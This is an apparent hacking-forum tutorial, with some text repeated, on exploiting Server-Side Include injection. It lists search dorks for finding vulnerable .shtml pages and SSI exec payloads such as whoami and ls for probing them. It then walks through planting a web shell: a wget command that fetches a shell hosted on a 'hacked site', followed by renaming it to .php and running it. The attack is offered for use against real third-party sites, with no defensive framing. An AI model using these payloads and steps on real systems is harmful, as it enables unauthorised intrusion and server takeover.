SSI Injection 11-09-2012, 09:18 AM
#1
In this tutorial, I will write about SSI Injection hope you like it. =)
-Wikipedia
Server-side Include Injection gives us the power to execute OS commands or include a restricted files contents the next time the page is served.
First, you need to find vulnerable site. =D
Here are some dorks:
Hope those are enough!
Time to test sites for vulnerability.
To find if the site is vulnerable, you should enter OS command.
Here are some example commands.
Write one of those commands in text box, login/registration fields etc...
![[Image: ssiy.jpg]](http://img838.imageshack.us/img838/6051/ssiy.jpg)
So when, you have find and test site for vulnerability its time to exploit it.
We are going to upload shell, you can download shells from my thread.
Ok, now you need .txt extension to your shell and you should upload it some where (hacked site, hosting...).
And, you should download it to the site who is vulnerable to SSI Injection. This is the command you should use.
So, if the text file is downloaded execute this command.
This coomand will show every file in the directory.
Now its time to change the extension to .php .
Now run listen command again.
And, your shell should be .php run it if every thing is OK, you have successful exploit the site.
Code:
SSI Injection (Server-side Include) is a server-side exploit technique that allows an attacker to send code into a web application, which will later be executed locally by the web server. SSI Injection exploits a web application's failure to sanitize user-supplied data before they are inserted into a server-side interpreted HTML file.Server-side Include Injection gives us the power to execute OS commands or include a restricted files contents the next time the page is served.
First, you need to find vulnerable site. =D
Here are some dorks:
Code:
inurl:bin/Cklb/
inurl:login.shtml
inurl:login.shtm
inurl:login.stm
inurl:search.shtml
inurl:search.shtm
inurl:search.stm
inurl:forgot.shtml
inurl:forgot.shtm
inurl:forgot.stm
inurl:register.shtml
inurl:register.shtm
inurl:register.stm
inurl:login.shtml?page=Time to test sites for vulnerability.
To find if the site is vulnerable, you should enter OS command.
Here are some example commands.
Code:
<!--#echo var="DATE_LOCAL" -->
Will display the Date.
<!--#exec cmd="whoami"-->
Will show which user is running on the server.
<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>
Will display all files in the directory (Linux).
<!-- #exec cmd="dir" -->
Will display all files in the directory (Windows).
<!--#echo var="DOCUMENT_URI" -->
Will display the document uri.Write one of those commands in text box, login/registration fields etc...
So when, you have find and test site for vulnerability its time to exploit it.
We are going to upload shell, you can download shells from my thread.
Ok, now you need .txt extension to your shell and you should upload it some where (hacked site, hosting...).
And, you should download it to the site who is vulnerable to SSI Injection. This is the command you should use.
Code:
<!--#exec cmd="wget URL to shell" -->Code:
<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>Now its time to change the extension to .php .
Code:
<!--#exec cmd="mv shell1.txt shell.php" -->Code:
<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)
![[Image: fSEZXPs.png]](https://i.imgur.com/fSEZXPs.png)
![[Image: lupado1c3f2.png]](http://www.auplod.com/u/lupado1c3f2.png)
![[Image: bAMEI93.jpg]](http://i.imgur.com/bAMEI93.jpg)
